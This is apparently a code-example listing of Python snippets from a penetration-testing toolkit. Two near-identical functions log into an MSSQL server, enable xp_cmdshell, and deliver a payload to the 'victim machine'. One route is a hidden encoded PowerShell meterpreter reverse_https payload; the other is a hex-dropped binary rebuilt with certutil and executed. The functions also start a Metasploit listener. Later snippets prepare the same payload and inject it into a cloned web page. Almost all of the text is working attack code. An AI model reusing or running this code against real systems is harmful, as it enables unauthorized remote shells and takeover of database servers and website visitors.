예제 #1
0
def deploy_hex2binary(ipaddr, port, username, password):
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port), username, password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    try:
        conn.execute_query(
            "exec master.dbo.sp_configure 'show advanced options',1;"
            "GO;"
            "RECONFIGURE;"
            "GO;"
            "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
            "GO;"
            "RECONFIGURE;"
            "GO")
    except:
        pass
    # just throw a simple command via powershell to get the output
    try:
        print(
            """Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n"""
        )

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status(
                "Powershell injection was selected to deploy to the remote system (awesome)."
            )
            option_ps = input(
                "Do you want to use powershell injection? [yes/no]:")
            if option_ps.lower(
            ) == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        print(err)
    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            attempts = 0
            while attempts <= 2:
                payload_filename = input(
                    "Enter the path to your file you want to deploy to the system (ex /root/blah.exe):"
                )
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                core.print_error(
                    "Computers are hard. Find the path and try again. Defaulting to Metasploit payload."
                )
                choice1 = "1"

        if choice1 == "1":
            web_path = None
            prep_powershell_payload()

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
                # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir),
                                         shell=True).wait()
                        subprocess.Popen(
                            "cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                            (core.setdir, core.setdir),
                            shell=True).wait()
                        subprocess.Popen(
                            "cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null"
                            % (core.setdir, core.setdir),
                            shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # we write out binary out to a file

        with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
            filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                        core.print_status(
                            "Starting the Metasploit listener...")
                        msf_path = core.meta_path()
                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(
                            os.path.join(core.meta_path() + "msfconsole"),
                            os.path.join(core.setdir + "meta_config")))

        # random executable name
        random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #
    if option == "1":
        core.print_status(
            "Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(
            core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status(
            "Prepping the payload for delivery and injecting alphanumeric shellcode..."
        )

        with open(os.path.join(core.setdir + "/payload_options.shellcode"),
                  "w") as filewrite:
            # format needed for shellcode generation
            filewrite.write(
                "windows/meterpreter/reverse_https {0},".format(port))

        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        with open(os.path.join(core.setdir + "x86.powershell")) as x86:
            x86 = x86.read()

        x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(
            x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(
                              os.path.join(core.setdir +
                                           "reports/powershell")))
        with open(
                os.path.join(
                    core.setdir +
                    "/reports/powershell/x86_powershell_injection.txt"),
                "w") as filewrite:
            filewrite.write(x86)

        # if our payload is x86 based - need to prep msfconsole rc
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            with open(
                    os.path.join(core.setdir +
                                 "reports/powershell/powershell.rc"),
                    "w") as filewrite:
                filewrite.write(
                    "use multi/handler\n"
                    "set payload windows/meterpreter/reverse_https\n"
                    "set lport {0}\n"
                    "set LHOST 0.0.0.0\n"
                    "exploit -j".format(port))
        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":

            try:
                core.module_reload(pexpect)
            except:
                import pexpect

            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(
                os.path.join(msf_path + "msfconsole"),
                os.path.join(core.setdir +
                             "reports/powershell/powershell.rc")))
            core.print_status(
                "Waiting for the listener to start first before we continue forward..."
            )
            core.print_status(
                "Be patient, Metasploit takes a little bit to start...")
            child2.expect("Starting the payload handler", timeout=30000)
            core.print_status(
                "Metasploit started... Waiting a couple more seconds for listener to activate.."
            )
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":

        # here we start the conversion and execute the payload
        core.print_status(
            "Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'"
            .format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":
                break

            core.print_status(
                "Deploying payload to victim machine (hex): {bold}{data}{endc}\n"
                .format(bold=core.bcolors.BOLD,
                        data=data,
                        endc=core.bcolors.ENDC))

            conn.execute_query(
                "exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(
                    data=data, exe=random_exe))
        core.print_status(
            "Delivery complete. Converting hex back to binary format.")
        core.print_status(
            "Dropping end header for binary format conversion...")
        conn.execute_query(
            "exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'"
            .format(random_exe))
        core.print_status(
            "Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled."
        )
        conn.execute_query(
            "exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".
            format(random_exe))
        core.print_status(
            "Executing the payload - magic has happened and now its time for that moment.. "
            "You know. When you celebrate. Salute to you ninja - you deserve it."
        )
        conn.execute_query(
            "exec master..xp_cmdshell '{0}.exe'".format(random_exe))
        # if we are using SET payload
        if choice1 == "1":
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                core.print_status(
                    "Spawning separate child process for listener...")
                try:
                    shutil.copyfile(os.path.join(core.setdir + "web_clone/x"),
                                    definepath)
                except:
                    pass

                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py",
                                 shell=True)
                # grab the port options

                # if core.check_options("PORT=") != 0:
                #     port = core.heck_options("PORT=")
                #
                # # if for some reason the port didnt get created we default to 443
                # else:
                #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = (
            "exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command, ))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir +
                                   "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(
            random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command, ))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
예제 #2
0
def deploy_hex2binary(ipaddr, port, username, password):
    # base variable used to select payload option
    option = None
    choice1 = "1"

    conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
                          username,
                          password)
    core.print_status("Enabling the xp_cmdshell stored procedure...")
    try:
        conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO;"
                           "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
                           "GO;"
                           "RECONFIGURE;"
                           "GO")
    except:
        pass
    # just throw a simple command via powershell to get the output
    try:
        print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")

        choice = input("Enter your choice:\n\n"
                       "1.) Use PowerShell Injection (recommended)\n"
                       "2.) Use Certutil binary conversion\n\n"
                       "Enter your choice [1]:")
        if choice == "":
            choice = "1"
        if choice == "1":
            core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
            option_ps = input("Do you want to use powershell injection? [yes/no]:")
            if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
                option = "1"
                core.print_status("Powershell delivery selected. Boom!")
            else:
                option = "2"

        # otherwise, fall back to the older version using debug conversion via hex
        else:
            core.print_status("Powershell not selected, using debug method.")
            option = "2"

    except Exception as err:
        print(err)
    payload_filename = None

    # if we don't have powershell
    if option == "2":
        # give option to use msf or your own
        core.print_status("You can either select to use a default "
                          "Metasploit payload here or import your "
                          "own in order to deliver to the system. "
                          "Note that if you select your own, you "
                          "will need to create your own listener "
                          "at the end in order to capture this.\n\n")
        choice1 = input("1.) Use Metasploit (default)\n"
                        "2.) Select your own\n\n"
                        "Enter your choice[1]:")

        if choice1 == "":
            choice1 = "1"

        if choice1 == "2":
            attempts = 0
            while attempts <= 2:
                payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
                if os.path.isfile(payload_filename):
                    break
                else:
                    core.print_error("File not found! Try again.")
                    attempts += 1
            else:
                core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
                choice1 = "1"

        if choice1 == "1":
            web_path = None
            prep_powershell_payload()

            # if we are using a SET interactive shell payload then we need to make
            # the path under web_clone versus ~./set
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                web_path = os.path.join(core.setdir + "web_clone")
                # then we are using metasploit
            else:
                if operating_system == "posix":
                    web_path = core.setdir
                    # if it isn't there yet
                    if not os.path.isfile(core.setdir + "1msf.exe"):
                        # move it then
                        subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
                        subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
                                         (core.setdir, core.setdir), shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
            # read in the binary
            data = fileopen.read()
            # convert the binary to hex
            data = binascii.hexlify(data)
            # we write out binary out to a file

        with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
            filewrite.write(data)

        if choice1 == "1":
            # if we are using metasploit, start the listener
            if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
                if operating_system == "posix":
                    try:
                        core.module_reload(pexpect)
                    except:
                        import pexpect
                        core.print_status("Starting the Metasploit listener...")
                        msf_path = core.meta_path()
                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                                        os.path.join(core.setdir + "meta_config")))

        # random executable name
        random_exe = core.generate_random_string(10, 15)

    #
    # next we deploy our hex to binary if we selected option 1 (powershell)
    #
    if option == "1":
        core.print_status("Using universal powershell x86 process downgrade attack..")
        payload = "x86"

        # specify ipaddress of reverse listener
        ipaddr = core.grab_ipaddress()
        core.update_options("IPADDR=" + ipaddr)
        port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))

        if not port:
            port = "443"

        core.update_options("PORT={0}".format(port))
        core.update_options("POWERSHELL_SOLO=ON")
        core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")

        with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
            # format needed for shellcode generation
            filewrite.write("windows/meterpreter/reverse_https {0},".format(port))

        try:
            core.module_reload(src.payloads.powershell.prep)
        except:
            import src.payloads.powershell.prep

        # create the directory if it does not exist
        if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
            os.makedirs(os.path.join(core.setdir + "reports/powershell"))

        with open(os.path.join(core.setdir + "x86.powershell")) as x86:
            x86 = x86.read()

        x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
        core.print_status("If you want the powershell commands and attack, "
                          "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
        with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
            filewrite.write(x86)

        # if our payload is x86 based - need to prep msfconsole rc
        if payload == "x86":
            powershell_command = x86
            # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
            with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
                filewrite.write("use multi/handler\n"
                                "set payload windows/meterpreter/reverse_https\n"
                                "set lport {0}\n"
                                "set LHOST 0.0.0.0\n"
                                "exploit -j".format(port))
        else:
            powershell_command = None

        # grab the metasploit path from config or smart detection
        msf_path = core.meta_path()
        if operating_system == "posix":

            try:
                core.module_reload(pexpect)
            except:
                import pexpect

            core.print_status("Starting the Metasploit listener...")
            child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
                                                     os.path.join(core.setdir + "reports/powershell/powershell.rc")))
            core.print_status("Waiting for the listener to start first before we continue forward...")
            core.print_status("Be patient, Metasploit takes a little bit to start...")
            child2.expect("Starting the payload handler", timeout=30000)
            core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
            time.sleep(5)

        # assign random_exe command to the powershell command
        random_exe = powershell_command

    #
    # next we deploy our hex to binary if we selected option 2 (debug)
    #

    if option == "2":

        # here we start the conversion and execute the payload
        core.print_status("Sending the main payload via to be converted back to a binary.")
        # read in the file 900 bytes at a time
        #with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
        fileopen = open(core.setdir + 'payload.hex', "r")
        core.print_status("Dropping initial begin certificate header...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
        while fileopen:
            data = fileopen.read(900).rstrip()
            #for data in fileopen.read(900).rstrip():
            if data == "":
                break

            core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
                                                                                                       data=data,
                                                                                                       endc=core.bcolors.ENDC))

            conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
                                                                                            exe=random_exe))
        core.print_status("Delivery complete. Converting hex back to binary format.")
        core.print_status("Dropping end header for binary format conversion...")
        conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
        core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
        conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
        core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
                          "You know. When you celebrate. Salute to you ninja - you deserve it.")
        conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
        # if we are using SET payload
        if choice1 == "1":
            if os.path.isfile(os.path.join(core.setdir + "set.payload")):
                core.print_status("Spawning separate child process for listener...")
                try:
                    shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
                except:
                    pass

                # start a threaded webserver in the background
                subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
                # grab the port options

                # if core.check_options("PORT=") != 0:
                #     port = core.heck_options("PORT=")
                #
                # # if for some reason the port didnt get created we default to 443
                # else:
                #     port = "443"

    # thread is needed here due to the connect not always terminating thread,
    # it hangs if thread isnt specified
    try:
        core.module_reload(thread)
    except:
        import thread

    # execute the payload
    # we append more commands if option 1 is used
    if option == "1":
        core.print_status("Triggering the powershell injection payload... ")
        sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
        thread.start_new_thread(conn.execute_query, (sql_command,))

    # using the old method
    if option == "2":
        core.print_status("Triggering payload stager...")
        alphainject = ""
        if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
            with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
                alphainject = fileopen.read()

        sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
        # start thread of SQL command that executes payload
        thread.start_new_thread(conn.execute_query, (sql_command,))
        time.sleep(1)

    # if pexpect doesnt exit right then it freaks out
    if choice1 == "1":
        if os.path.isfile(os.path.join(core.setdir + "set.payload")):
            os.system("python ../../payloads/set_payloads/listener.py")
        try:
            # interact with the child process through pexpect
            child2.interact()
            try:
                os.remove("x")
            except:
                pass
        except:
            pass
예제 #3
0
try:

    # specify ipaddress of reverse listener
    ipaddr = core.grab_ipaddress()
    core.update_options("IPADDR=" + ipaddr)
    port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
    if port == "":
        port = "443"
    core.update_options("PORT={0}".format(port))
    with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
        # format needed for shellcode generation
        filewrite.write("{0} {1},".format(payload, port))
    core.update_options("POWERSHELL_SOLO=ON")
    core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")

    prep_powershell_payload()

    # create the directory if it does not exist
    if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
        os.makedirs(os.path.join(core.setdir + "reports/powershell"))

    with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
        x86 = fileopen.read()
    x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
    core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
    filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
    #with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
    filewrite.write(x86)
    filewrite.close()
    payload = "windows/meterpreter/reverse_https\n"  # if we are using x86
    command = x86  # assign powershell to command
예제 #4
0
 # write out the payload for powershell injection to pick it up if used
 filewrite = open(setdir + "/metasploit.payload", "w")
 filewrite.write(choice1)
 filewrite.close()
 # import if on
 setshell_counter = 0
 powershell = check_config("POWERSHELL_INJECTION=")
 if powershell.lower() == "on" or powershell.lower() == "yes":
     if choice1 == "set/reverse_shell" or choice1 == "RATTE":
         print_status(
             "Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
         setshell_counter = 1
     if setshell_counter == 0:
         if custom == 0:  # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
             if os.path.isfile("%s/web_clone/index.html" % (setdir)):
                 prep_powershell_payload()
                 if os.path.isfile("%s/x86.powershell" % (setdir)):
                     fileopen1 = open(
                         "%s/x86.powershell" % (setdir), "r")
                     x86 = fileopen1.read()
                     # open up the x86 powershell attack
                     fileopen3 = fileopen = open(
                         "%s/web_clone/index.html" % (setdir), "r")
                     filewrite = open(
                         "%s/web_clone/index.html.new" % (setdir), "w")
                     data = fileopen3.read()
                     data = data.replace(
                         'param name="5" value=""', 'param name="5" value="%s"' % (x86))
                     data = data.replace(
                         'param name="6" value=""', 'param name="6" value="%s"' % (x86))
                     # check if we don't want to deploy binaries